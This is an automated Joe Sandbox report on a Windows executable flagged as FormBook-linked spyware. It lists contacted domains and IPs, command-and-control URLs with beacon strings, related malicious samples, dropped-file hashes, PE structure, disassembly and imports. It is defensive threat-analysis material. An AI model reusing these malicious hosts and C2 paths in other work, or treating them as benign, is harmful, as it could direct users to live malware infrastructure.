https://ac.ecosia.org/autocomplete?q=	rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.lgdiamonds.info	GVXcOVOPuWmumK.exe, 00000007.00000002.2587932076.0000000005569000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
130.185.109.77	www.lgdiamonds.info	Germany	51191	XIRRADE	false
13.248.169.48	www.bcg.services	United States	16509	AMAZON-02US	false
23.167.152.41	gtml.huksa.huhusddfnsuegcdn.com	Reserved	395774	ESVC-ASNUS	false
154.23.178.231	43kdd.top	United States	174	COGENT-174US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587909
Start date and time:	2025-01-10 19:16:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	cNDddMAF5u.exe renamed because original name is a hash value
Original Sample Name:	e9882b5a646f9dd7be8e8f48f15b39e22609789546b7e716b1e38c8354b8fd64.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@7/4
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 91% Number of executed functions: 43 Number of non-executed functions: 286
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
15:09:02	API Interceptor	1491207x Sleep call for process: rasdial.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
130.185.109.77	lgkWBwqY15.exe	Get hash	malicious	FormBook	Browse	www.lgdiamonds.info/cv1w/
	New quotation request.exe	Get hash	malicious	FormBook	Browse	www.lgdiamonds.info/cv1w/
	New Order.exe	Get hash	malicious	FormBook	Browse	www.lgdiamonds.info/q2b2/
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.lgdiamonds.info/cv1w/
	MaMsKRmgXZ.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.holzleisten24.shop/ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKP
	Product24573.exe	Get hash	malicious	FormBook	Browse	www.berlinhealthweek.com/bpg5/?ti-8=LyKdFPBKAe5W&5eb6=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA==
	Siirtokuitti_006703.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.printmyride.store/tchg/?O0qEM=QQ6dpIpAk027UR3BL5U7sG0DxH6sKQa5YnzY0agrXpda3w5URJfAhsqjtJqbY2/M8fhrkTh6mIV7dbZQ8z6SYrdm6JILdk9Mfg==&CF1Ki=UnDuQcdCFs1MNsvY
	P5348574_74676.exe	Get hash	malicious	FormBook	Browse	www.berlinhealthweek.com/bpg5/?lpw7=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==&UZCu=zJfEuRXw-P
	535276_86376.exe	Get hash	malicious	FormBook	Browse	www.berlinhealthweek.com/bpg5/?yDcF=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&jdd=UX4BZm
	Product_List.exe	Get hash	malicious	FormBook	Browse	www.berlinhealthweek.com/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==
13.248.169.48	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	www.shipley.group/5g1j/
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P
	TU0kiz3mxz.exe	Get hash	malicious	FormBook	Browse	www.cleans.xyz/m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.bonheur.tech/t3iv/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.bonheur.tech/t3iv/
	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.londonatnight.coffee/13to/
	236236236.elf	Get hash	malicious	Unknown	Browse	portlandbeauty.com/
	profroma invoice.exe	Get hash	malicious	FormBook	Browse	www.aktmarket.xyz/wb7v/
	SC_TR11670000_pdf.exe	Get hash	malicious	FormBook	Browse	www.xphone.net/i7vz/
	RFQ_P.O.1212024.scr	Get hash	malicious	FormBook	Browse	www.krshop.shop/5p01/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gtml.huksa.huhusddfnsuegcdn.com	WDpjhC3jpq.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	01152-11-12-24.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	Outstanding Invoices Spreadsheet Scan 00495_PDF.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	DRAFT COPY BL, CI & PL.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	lgkWBwqY15.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	New quotation request.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	Invoice 10493.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	HUEtVS3MQe.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
www.lgdiamonds.info	lgkWBwqY15.exe	Get hash	malicious	FormBook	Browse	130.185.109.77
	New quotation request.exe	Get hash	malicious	FormBook	Browse	130.185.109.77
	New Order.exe	Get hash	malicious	FormBook	Browse	130.185.109.77
	need quotations.exe	Get hash	malicious	FormBook	Browse	130.185.109.77

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COGENT-174US	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	38.181.21.54
	https://sign-as.allarknow.online/	Get hash	malicious	Unknown	Browse	50.7.127.10
	http://pdfdrive.com.co	Get hash	malicious	Unknown	Browse	143.244.56.53
	https://www.cineuserdad.ec	Get hash	malicious	Unknown	Browse	50.7.24.35
	5.elf	Get hash	malicious	Unknown	Browse	38.148.53.45
	armv5l.elf	Get hash	malicious	Unknown	Browse	38.12.137.2
	https://aqctslc.com/	Get hash	malicious	Unknown	Browse	38.165.16.38
	3.elf	Get hash	malicious	Unknown	Browse	154.22.18.26
	Fantazy.mips.elf	Get hash	malicious	Unknown	Browse	38.64.166.19
	Fantazy.x86.elf	Get hash	malicious	Unknown	Browse	161.82.13.62
AMAZON-02US	https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Get hash	malicious	HTMLPhisher	Browse	108.138.26.73
	RubzLi27lr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	3.130.71.34
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modal	Get hash	malicious	Unknown	Browse	108.138.26.78
	FG5wHs4fVX.exe	Get hash	malicious	FormBook	Browse	18.143.155.63
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	https://www.depoqq.win/geno	Get hash	malicious	Unknown	Browse	34.250.141.206
	phish_alert_sp2_2.0.0.0 (1).eml	Get hash	malicious	Unknown	Browse	108.138.26.51
	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	18.143.155.63
	https://www.shinsengumiusa.com/mrloskie	Get hash	malicious	Unknown	Browse	3.120.85.61
XIRRADE	lgkWBwqY15.exe	Get hash	malicious	FormBook	Browse	130.185.109.77
	New quotation request.exe	Get hash	malicious	FormBook	Browse	130.185.109.77
	New Order.exe	Get hash	malicious	FormBook	Browse	130.185.109.77
	need quotations.exe	Get hash	malicious	FormBook	Browse	130.185.109.77
	file.exe	Get hash	malicious	SystemBC	Browse	185.169.24.192
	Zam#U00f3wienie Z2300056_pdf .scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.169.24.118
	New order -24900242 OP_pdf .exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.169.24.118
	vAZYIEQMP8.elf	Get hash	malicious	Mirai, Moobot	Browse	195.138.242.157
	MaMsKRmgXZ.exe	Get hash	malicious	FormBook, GuLoader	Browse	130.185.109.77
	Product24573.exe	Get hash	malicious	FormBook	Browse	130.185.109.77
ESVC-ASNUS	WDpjhC3jpq.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	01152-11-12-24.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	Outstanding Invoices Spreadsheet Scan 00495_PDF.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	DRAFT COPY BL, CI & PL.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	lgkWBwqY15.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	New quotation request.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	Payment-251124.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	23.167.152.41

Process:	C:\Users\user\Desktop\cNDddMAF5u.exe
File Type:	data
Category:	modified
Size (bytes):	288256
Entropy (8bit):	7.9916350467331885
Encrypted:	true
SSDEEP:	6144:9BApkzCQsdevN4ZML0xWu4ALetwehWOK+XYvkOoCwQxMnte:9mpk8Hi0Mdp6tMOvQe
MD5:	D6DC301097A4B4410F739CFA0E42BA61
SHA1:	84EE0AF5A0094083B47DEB7528288D38BAD90529
SHA-256:	85820D4B6D58C2DA058454FBA8C8A35A1037F9B0F1CD87AD770A7F70E442C0BA
SHA-512:	4D55E2E72D4D6AE4E7050F101A555F9BC593130DA34A77E4C4D63622E61B37A1B4E596E4E3E2340EBD7058A3E8835DAB6955F6E0037DABBEE40AB122AFC11396
Malicious:	false
Reputation:	low
Preview:	...2HQ8QEEL9.O2.Q8QAEL9rAO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL9.AO2EN._A.E...N~.pl9(6lI@.(@<.2 +"VFa-Wk#M?a,".v...&>\4oHA3.AO2KQ8Q8DE..!(.v1_.\|%+.(...q1_.[....!(.Q...}%+.`(,Zv1_.AEL92AO2..8Q.DM9..PkKQ8QAEL9.AM3@P3QA.H92AO2KQ8Q!QL92QO2K!<QAE.92QO2KS8QGEL92AO2MQ8QAEL921K2KS8QAEL90A..KQ(QAUL92A_2KA8QAEL9"AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL9.5J?Q8QE.H92QO2K.<QAUL92AO2KQ8QAEL9.AORKQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2

C:\Users\user\AppData\Local\Temp\a155F05G

Download File

Process:	C:\Windows\SysWOW64\rasdial.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	modified
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut54A3.tmp

Download File

Process:	C:\Users\user\Desktop\cNDddMAF5u.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.9916350467331885
Encrypted:	true
SSDEEP:	6144:9BApkzCQsdevN4ZML0xWu4ALetwehWOK+XYvkOoCwQxMnte:9mpk8Hi0Mdp6tMOvQe
MD5:	D6DC301097A4B4410F739CFA0E42BA61
SHA1:	84EE0AF5A0094083B47DEB7528288D38BAD90529
SHA-256:	85820D4B6D58C2DA058454FBA8C8A35A1037F9B0F1CD87AD770A7F70E442C0BA
SHA-512:	4D55E2E72D4D6AE4E7050F101A555F9BC593130DA34A77E4C4D63622E61B37A1B4E596E4E3E2340EBD7058A3E8835DAB6955F6E0037DABBEE40AB122AFC11396
Malicious:	false
Reputation:	low
Preview:	...2HQ8QEEL9.O2.Q8QAEL9rAO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL9.AO2EN._A.E...N~.pl9(6lI@.(@<.2 +"VFa-Wk#M?a,".v...&>\4oHA3.AO2KQ8Q8DE..!(.v1_.\|%+.(...q1_.[....!(.Q...}%+.`(,Zv1_.AEL92AO2..8Q.DM9..PkKQ8QAEL9.AM3@P3QA.H92AO2KQ8Q!QL92QO2K!<QAE.92QO2KS8QGEL92AO2MQ8QAEL921K2KS8QAEL90A..KQ(QAUL92A_2KA8QAEL9"AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL9.5J?Q8QE.H92QO2K.<QAUL92AO2KQ8QAEL9.AORKQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.155181819122473
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	cNDddMAF5u.exe
File size:	1'266'176 bytes
MD5:	caf89165d3dfdde3273cce4deade7db4
SHA1:	89409de660c21df6b496060e42495a5d9346ed96
SHA256:	e9882b5a646f9dd7be8e8f48f15b39e22609789546b7e716b1e38c8354b8fd64
SHA512:	5a0726aeb4423b9c7c719f0b7f4df016325327cf209da1ad81a431ac990111c97de2bf078b08c85e81e05871bf7ad9b86d13da9bbccd30b4fc56c5fc7fa84d1c
SSDEEP:	24576:nqDEvCTbMWu7rQYlBQcBiT6rprG8angsOayPasr5mMw:nTvC/MTQYxsWR7angstxstv
TLSH:	2E45CF0273C1D022FFAB96334B5AF6515BBC69260123E62F13981D79BE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6760E1BA [Tue Dec 17 02:28:10 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007FC394BCA903h
jmp 00007FC394BCA20Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FC394BCA3EDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FC394BCA3BAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FC394BCCFADh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FC394BCCFF8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FC394BCCFE1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x5e630	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x133000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x5e630	0x5e800	da23d8f8d8d0afd05eaf8ad6d3c53dd4	False	0.9318343874007936	data	7.906408115533948	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x133000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd44a0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd45c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd48b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd49d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5880	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6128	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd6690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8c38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xd9ce0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_STRING	0xda148	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xda6dc	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdad68	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb1f8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdb7f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdbe50	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc2b8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc410	0x55cc5	data			1.0003300808982754
RT_GROUP_ICON	0x1320d8	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x132150	0x14	data	English	Great Britain	1.15
RT_VERSION	0x132164	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x132240	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
